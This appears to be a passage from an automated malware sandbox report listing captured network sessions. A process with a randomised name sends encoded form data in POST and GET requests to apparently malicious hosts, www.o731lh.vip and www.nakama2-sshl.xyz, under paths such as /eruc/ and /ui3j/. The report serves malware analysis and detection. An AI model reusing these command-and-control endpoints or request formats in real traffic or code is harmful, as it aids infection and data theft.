                                                                                                                    Oct 9, 2024 14:19:46.872571945 CEST672INData Raw: 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68
                                                                                                                    Data Ascii: mg src="assets/custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/ima
                                                                                                                    Oct 9, 2024 14:19:46.872606993 CEST1236INData Raw: 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73
                                                                                                                    Data Ascii: t"> <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables N
                                                                                                                    Oct 9, 2024 14:19:46.872639894 CEST1236INData Raw: 72 2d 6e 61 76 20 6d 78 2d 61 75 74 6f 20 66 61 62 6c 65 73 2d 6e 61 76 22 3e 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69
                                                                                                                    Data Ascii: r-nav mx-auto fables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true" ari
                                                                                                                    Oct 9, 2024 14:19:46.872675896 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 46 65 61 74 75 72 65 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: Features </a> <ul class="dropdown-menu" aria-labelledby="sub-nav2"> <li><a class="dropdown-item dropdown-togg
                                                                                                                    Oct 9, 2024 14:19:46.872711897 CEST672INData Raw: 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 20 32 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: lass="dropdown-item dropdown-toggle" href="#">Header 2</a> <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header
                                                                                                                    Oct 9, 2024 14:19:46.872762918 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                                                                                                                    Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                                                                                                    Oct 9, 2024 14:19:46.872798920 CEST1236INData Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                    Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                                                                                                    Oct 9, 2024 14:19:46.878035069 CEST1236INData Raw: 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20
                                                                                                                    Data Ascii: rs</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.4495533.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:00.099026918 CEST713OUTPOST /eruc/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.o731lh.vip
                                                                                                                    Origin: http://www.o731lh.vip
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.o731lh.vip/eruc/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 75 72 41 6c 36 54 57 36 4f 43 34 61 2b 79 52 51 43 58 75 59 66 33 49 5a 71 41 32 51 31 35 4a 61 65 51 49 4a 62 63 56 70 2b 30 41 50 2b 6e 2b 5a 66 62 70 57 78 56 57 75 2b 76 56 52 52 69 59 6c 77 37 32 33 63 74 61 78 59 6e 6f 2f 54 6f 34 50 62 41 41 78 70 42 6d 31 6e 32 63 4f 34 38 78 71 46 66 78 54 6b 34 50 34 7a 63 32 71 57 46 63 67 64 52 36 57 44 77 79 62 51 34 59 75 55 70 51 6b 41 4b 64 68 64 42 79 61 36 39 52 2f 6c 52 4b 74 7a 34 68 4a 71 42 77 4b 46 32 4c 45 41 43 50 41 6c 54 36 4e 4d 4c 2f 43 53 48 4d 65 4d 33 2f 50 55 4f 68 38 66 51 3d 3d
                                                                                                                    Data Ascii: AHkx=5rvH253M/d+aurAl6TW6OC4a+yRQCXuYf3IZqA2Q15JaeQIJbcVp+0AP+n+ZfbpWxVWu+vVRRiYlw723ctaxYno/To4PbAAxpBm1n2cO48xqFfxTk4P4zc2qWFcgdR6WDwybQ4YuUpQkAKdhdBya69R/lRKtz4hJqBwKF2LEACPAlT6NML/CSHMeM3/PUOh8fQ==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.4495633.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:02.645478964 CEST733OUTPOST /eruc/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.o731lh.vip
                                                                                                                    Origin: http://www.o731lh.vip
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.o731lh.vip/eruc/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 76 49 49 6c 70 6c 65 36 46 43 34 5a 30 53 52 51 59 6e 75 63 66 33 55 5a 71 45 6d 41 31 4c 39 61 64 30 41 4a 61 64 56 70 74 45 41 50 71 33 2f 53 43 72 70 4e 78 56 71 4d 2b 75 70 52 52 69 4d 6c 77 36 47 33 64 65 69 79 5a 33 6f 39 61 49 34 4e 56 67 41 78 70 42 6d 31 6e 32 5a 72 34 38 5a 71 46 76 68 54 6c 5a 50 2f 39 38 32 72 52 46 63 67 4c 52 36 73 44 77 7a 4f 51 38 59 45 55 76 4d 6b 41 49 56 68 61 56 75 5a 7a 39 52 39 76 78 4c 6c 79 5a 51 74 6a 67 4a 6b 41 58 48 51 66 43 44 55 6b 56 72 58 64 36 65 56 41 48 6f 74 52 77 32 37 5a 4e 63 31 45 62 68 31 48 52 36 74 61 42 39 39 6a 55 6d 64 32 78 64 69 77 50 4d 3d
                                                                                                                    Data Ascii: AHkx=5rvH253M/d+avIIlple6FC4Z0SRQYnucf3UZqEmA1L9ad0AJadVptEAPq3/SCrpNxVqM+upRRiMlw6G3deiyZ3o9aI4NVgAxpBm1n2Zr48ZqFvhTlZP/982rRFcgLR6sDwzOQ8YEUvMkAIVhaVuZz9R9vxLlyZQtjgJkAXHQfCDUkVrXd6eVAHotRw27ZNc1Ebh1HR6taB99jUmd2xdiwPM=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.4495793.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:05.191098928 CEST10815OUTPOST /eruc/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.o731lh.vip
                                                                                                                    Origin: http://www.o731lh.vip
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10301
                                                                                                                    Referer: http://www.o731lh.vip/eruc/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 35 72 76 48 32 35 33 4d 2f 64 2b 61 76 49 49 6c 70 6c 65 36 46 43 34 5a 30 53 52 51 59 6e 75 63 66 33 55 5a 71 45 6d 41 31 4c 46 61 65 44 41 4a 62 2b 74 70 75 45 41 50 31 48 2b 56 43 72 6f 66 78 52 2b 49 2b 75 6c 42 52 67 30 6c 78 63 36 33 49 66 69 79 53 33 6f 39 59 49 34 4f 62 41 42 31 70 42 57 35 6e 32 70 72 34 38 5a 71 46 73 4a 54 73 6f 50 2f 2f 38 32 71 57 46 63 73 64 52 37 69 44 30 66 65 51 38 63 2b 58 63 55 6b 44 72 39 68 62 67 79 5a 34 39 52 6a 73 78 4b 6a 79 5a 63 79 6a 67 56 43 41 57 44 36 66 41 66 55 6c 77 47 70 4d 49 62 4a 58 32 67 50 44 68 71 67 42 50 6b 6f 46 6f 6c 75 4a 44 4b 48 59 67 52 53 34 6d 76 61 7a 44 4a 66 68 4c 38 47 71 34 75 39 72 7a 56 6a 45 50 64 38 72 5a 63 32 54 42 2b 31 46 2f 36 2b 48 6e 33 7a 65 33 62 41 63 42 34 74 48 78 54 41 35 64 35 72 70 4e 54 35 77 71 30 43 57 6c 32 37 50 6e 4c 5a 33 4a 54 6b 37 74 79 56 77 56 4c 39 50 69 67 6e 6b 39 4c 44 6e 77 6e 46 64 41 6b 4f 37 73 32 39 6b 63 49 62 30 4f 69 53 58 54 36 79 37 77 31 56 76 36 58 5a 35 38 4d 41 41 [TRUNCATED]
                                                                                                                    Data Ascii: AHkx=5rvH253M/d+avIIlple6FC4Z0SRQYnucf3UZqEmA1LFaeDAJb+tpuEAP1H+VCrofxR+I+ulBRg0lxc63IfiyS3o9YI4ObAB1pBW5n2pr48ZqFsJTsoP//82qWFcsdR7iD0feQ8c+XcUkDr9hbgyZ49RjsxKjyZcyjgVCAWD6fAfUlwGpMIbJX2gPDhqgBPkoFoluJDKHYgRS4mvazDJfhL8Gq4u9rzVjEPd8rZc2TB+1F/6+Hn3ze3bAcB4tHxTA5d5rpNT5wq0CWl27PnLZ3JTk7tyVwVL9Pignk9LDnwnFdAkO7s29kcIb0OiSXT6y7w1Vv6XZ58MAA8fhwoVAZ+dc8YsxgmqpLdLUwhocdfYdUNes1TvvC4cScs5zCIRuRBfXO+LGZ4loJqJpMNt2J0Zaqs4HUEraNDqRPjrPmUFn3lMP3OBZHcUwVuv+xsgTlMNcSSPRyIDw6Ge0Lb1UEy77zMiL4KH3ZGkD4bWZhIsoOTOM7YNn1vvCbbdy2K4ii1rWzBYv+tlLuvTA282uDqJmkMVP8O4RHn7Oz+/uuhUVccSDJieMbsmQ1wF/QypsjLE5l9tHdWI7gZ2+Jd6+p9k16YjfaM3bQhMniSgASyWQog2RwJ567cFsdzXTstarxofttB0/NrZPicSKEjSPg+fYa+V6wJ7BmQ+M6+LNybh7UU3r6z7Z0ZW2fIUEUC6n+P1lmBuM/XOEFosf9EJ2Aol5AbHuYz0HjCVbzHElnCrqieADtU3tdttKu9ksoXyTfO/Cb8W/bmqpvJwCbotrxV0szUQ2OrZ0NsVK+aJhwbvqCzFfxATJQCKPHZB1hQs5/Lad/RPmnsiYoN2bvRQUiQFAvUNqFGairqBvEgnaZo/7limykDyQSCCucIpyoTcoCKuKwJPZOZM5EtFYHDjnRUbHGECYmDa0vt5NT/VjSDEI9ar/p1sujH/JdheMU2/DJ+GeQcSV3Ll2FSL2Mn5HYBekOfSc6hQmGfMuU5CbfRAS1Kx [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.4495933.33.130.190803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:07.763654947 CEST460OUTGET /eruc/?AHkx=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Host: www.o731lh.vip
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Oct 9, 2024 14:20:09.135030985 CEST400INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:09 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 260
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 41 48 6b 78 3d 30 70 48 6e 31 4d 32 67 77 61 4c 35 6d 71 6c 39 6a 53 69 35 44 68 70 6b 75 78 35 35 41 54 75 6f 46 47 4d 58 75 33 61 61 34 71 5a 49 46 68 49 5a 54 70 35 38 39 56 38 52 72 41 4f 62 53 38 73 65 2b 52 79 5a 6d 4a 64 6b 56 51 77 39 77 61 53 46 64 66 61 4a 51 41 39 72 54 62 70 58 44 47 42 37 38 78 57 69 6f 47 4e 57 6f 64 52 76 4b 65 6c 62 6f 4c 6e 32 7a 72 41 3d 26 72 66 2d 4c 5a 3d 4a 6c 43 74 75 4e 33 48 71 50 4f 38 43 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?AHkx=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA=&rf-LZ=JlCtuN3HqPO8C"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.449631183.181.83.131803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:14.708749056 CEST731OUTPOST /ui3j/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.nakama2-sshl.xyz
                                                                                                                    Origin: http://www.nakama2-sshl.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 201
                                                                                                                    Referer: http://www.nakama2-sshl.xyz/ui3j/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 61 61 69 35 72 46 63 7a 36 59 46 54 36 30 62 33 4a 58 37 4c 39 76 72 6f 58 4f 61 73 70 45 4c 30 53 67 62 54 68 79 4e 34 6a 77 72 31 32 45 6b 6a 50 4f 2b 51 43 36 62 54 72 47 57 67 57 37 54 39 65 6d 31 4d 65 45 39 62 30 75 58 44 2b 58 45 55 52 5a 45 61 41 4d 6b 51 46 6b 68 4a 76 59 54 6e 52 2f 72 5a 41 44 52 41 66 42 31 64 30 2b 73 51 57 34 6c 4a 45 4e 48 41 56 62 57 64 59 51 48 65 46 57 38 44 54 6b 2f 43 63 46 31 4c 66 35 62 49 77 2f 4d 37 7a 30 54 56 49 77 62 62 35 4b 6c 57 4c 38 59 44 51 69 50 45 4a 4f 69 2f 54 59 47 4a 2b 65 49 32 79 51 3d 3d
                                                                                                                    Data Ascii: AHkx=Jx2AzDIVkhjYaai5rFcz6YFT60b3JX7L9vroXOaspEL0SgbThyN4jwr12EkjPO+QC6bTrGWgW7T9em1MeE9b0uXD+XEURZEaAMkQFkhJvYTnR/rZADRAfB1d0+sQW4lJENHAVbWdYQHeFW8DTk/CcF1Lf5bIw/M7z0TVIwbb5KlWL8YDQiPEJOi/TYGJ+eI2yQ==
                                                                                                                    Oct 9, 2024 14:20:15.573736906 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:15 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 [TRUNCATED]
                                                                                                                    Data Ascii: 18c4\{#u{hZV3r@`,[SVKVV``&kT%+wnFi$ULHq^s=}n7~.>CRYe,_z!i2ZC-6r,laeY2QuJGD6]CkI}h{99uEq:RPloQj7G[vsQ\-#W,sk\7rO_|X^I[;t#wh;nKM,5PK3\Ukv! mc1*84_ncpeM8?>u&ib,g#-",pm7rZoFbgBn_|"=SI]FN]zZEUNi1u;MM2i6(pzIXyk}sde5zh60)dNukfC 1d2Gi{:5_4c%$Y+$9%ois!%-_9YW8N2tuKfk#5-G"[f}Y$d5hALW`3|vQ/yyij^-SkIeii1<CMUA.C,o]Z,c}ucl]Yl1}xO+-m%{c
                                                                                                                    Oct 9, 2024 14:20:15.573775053 CEST1236INData Raw: b6 64 d7 68 61 9c de ae 18 15 23 7b 9c 35 80 28 9d 81 27 f3 09 8e 8b 6d 80 d3 b0 bc 56 2e 4f 35 47 eb 35 0d 97 c8 d1 9b e3 a7 98 9d ae 0f 19 18 86 2d 93 54 30 7c a5 d9 d2 9b f5 6c 0c 9c 98 c4 f0 72 b9 55 5e ad 65 0f 67 42 09 85 4d d4 af 1a 2d b5
                                                                                                                    Data Ascii: dha#{5('mV.O5G5-T0|lrU^egBM-gkUc-aqYWX-]B`#BjKfjet.YaVJQ]PcA*kKZ.)$q<ZO#bZTh=FL%15PW@CJB:^TT
                                                                                                                    Oct 9, 2024 14:20:15.573786974 CEST1236INData Raw: c7 13 85 33 00 e4 13 33 20 b2 6c e1 0c 00 d9 bc 0c 78 22 ff 38 03 44 31 33 09 73 01 95 13 f4 54 1e c5 0e 78 36 c1 cb 4c f2 fc 39 fd b0 b2 80 ea 30 34 dd 07 4e 3c e4 5a 99 b6 ae 20 ac de e8 5b 83 8e 69 a3 bc 20 01 45 49 94 1d 70 8c b1 02 83 7a 69
                                                                                                                    Data Ascii: 33 lx"8D13sTx6L904N<Z [i EIpziyrxwu";(luM(xbbQ^-""2SVoRjZDZB<eF;*PU'J<t,#bNY3^c=iA*[9(dzvT
                                                                                                                    Oct 9, 2024 14:20:15.573885918 CEST1236INData Raw: b0 67 9c 0b 51 bc ed ae 23 72 2f ac a3 ce aa 30 b0 a4 81 b5 b4 94 5b 2a c1 bc 1f a0 ab 54 85 9c 63 5b 54 f4 ab e7 98 d8 04 d8 1c 91 ab e9 30 ff 3d cc 60 73 4b b8 25 23 c3 3b f7 68 ba a1 e9 dd 04 e7 d0 dd 04 d3 43 f8 1c 10 26 73 04 c4 10 54 e3 34
                                                                                                                    Data Ascii: gQ#r/0[*Tc[T0=`sK%#;hC&sT4\vr]q6Cx!mD@.($EnLn9"g+D]p)D874Defl2,:4-fm_;+7Gz|Y\Yp>}p[x
                                                                                                                    Oct 9, 2024 14:20:15.573895931 CEST1236INData Raw: 53 38 0d 0f 3e f1 d8 1f 2f 07 10 f7 f2 ff 06 47 39 04 59 96 44 4a e1 49 50 7c 96 d3 40 7e e3 37 22 65 13 ce 94 7c 0d 71 6b c2 43 a3 8b 87 88 8c 4c b3 45 9b 05 65 44 68 76 6c 9b 20 35 43 94 c4 f9 4b 04 25 b8 db dd d9 32 ed b6 13 2e 62 a3 bf 59 29
                                                                                                                    Data Ascii: S8>/G9YDJIP|@~7"e|qkCLEeDhvl 5CK%2.bY)W*J]Q$H$FN[-kLR mIG>}9vWZFaM?qKZ6ayeuh;65xGH_v
                                                                                                                    Oct 9, 2024 14:20:15.573909998 CEST546INData Raw: 56 e5 92 5a a5 22 72 84 b6 f9 8c a1 e9 72 ab 3b 43 23 0a b1 fa 8e b5 df 36 2d 2b 4e 5b b5 a4 d6 a9 cc 99 68 8b 0d 39 1d 4d 34 59 9c e6 c2 3b 0f db 9e 8c 95 75 b5 fc e6 82 72 1f bd af f5 81 07 2f 5c bc 70 49 ba 4f 59 a0 8a a9 dd be de 5e 41 71 c9
                                                                                                                    Data Ascii: VZ"rr;C#6-+N[h9M4Y;ur/\pIOY^AqU_8;6Uy${VsZ$?k7_d/a9/N-JX<`^xc32(;aVs/wj|CNOi&=~Jiw(~J@K&FT?D%


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.449633183.181.83.131803732C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 9, 2024 14:20:17.256243944 CEST751OUTPOST /ui3j/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.nakama2-sshl.xyz
                                                                                                                    Origin: http://www.nakama2-sshl.xyz
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 221
                                                                                                                    Referer: http://www.nakama2-sshl.xyz/ui3j/
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                                                                                                                    Data Raw: 41 48 6b 78 3d 4a 78 32 41 7a 44 49 56 6b 68 6a 59 62 36 53 35 75 6d 6b 7a 38 34 46 4d 31 55 62 33 44 33 37 50 39 76 6e 6f 58 50 75 38 70 32 76 30 53 43 44 54 69 33 68 34 69 77 72 31 69 55 6b 36 42 75 2b 62 43 36 47 75 72 47 71 67 57 34 76 39 65 6a 5a 4d 65 58 6c 59 37 65 58 42 34 58 45 57 53 70 45 61 41 4d 6b 51 46 6b 45 55 76 59 4c 6e 52 50 37 5a 42 69 52 44 44 78 31 43 7a 2b 73 51 53 34 6c 46 45 4e 48 69 56 61 36 6e 59 56 4c 65 46 57 73 44 54 32 58 42 4a 31 31 4a 52 5a 61 6e 38 66 6c 32 7a 33 36 35 50 7a 33 55 2f 4b 52 4f 44 61 4a 5a 42 54 75 54 62 4f 47 4d 4f 66 50 39 7a 64 31 2f 70 66 2f 72 67 36 72 52 36 57 62 61 31 73 4c 6f 64 75 50 4c 31 41 55 3d
                                                                                                                    Data Ascii: AHkx=Jx2AzDIVkhjYb6S5umkz84FM1Ub3D37P9vnoXPu8p2v0SCDTi3h4iwr1iUk6Bu+bC6GurGqgW4v9ejZMeXlY7eXB4XEWSpEaAMkQFkEUvYLnRP7ZBiRDDx1Cz+sQS4lFENHiVa6nYVLeFWsDT2XBJ11JRZan8fl2z365Pz3U/KRODaJZBTuTbOGMOfP9zd1/pf/rg6rR6Wba1sLoduPL1AU=
                                                                                                                    Oct 9, 2024 14:20:18.095438957 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 09 Oct 2024 12:20:17 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                    Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"
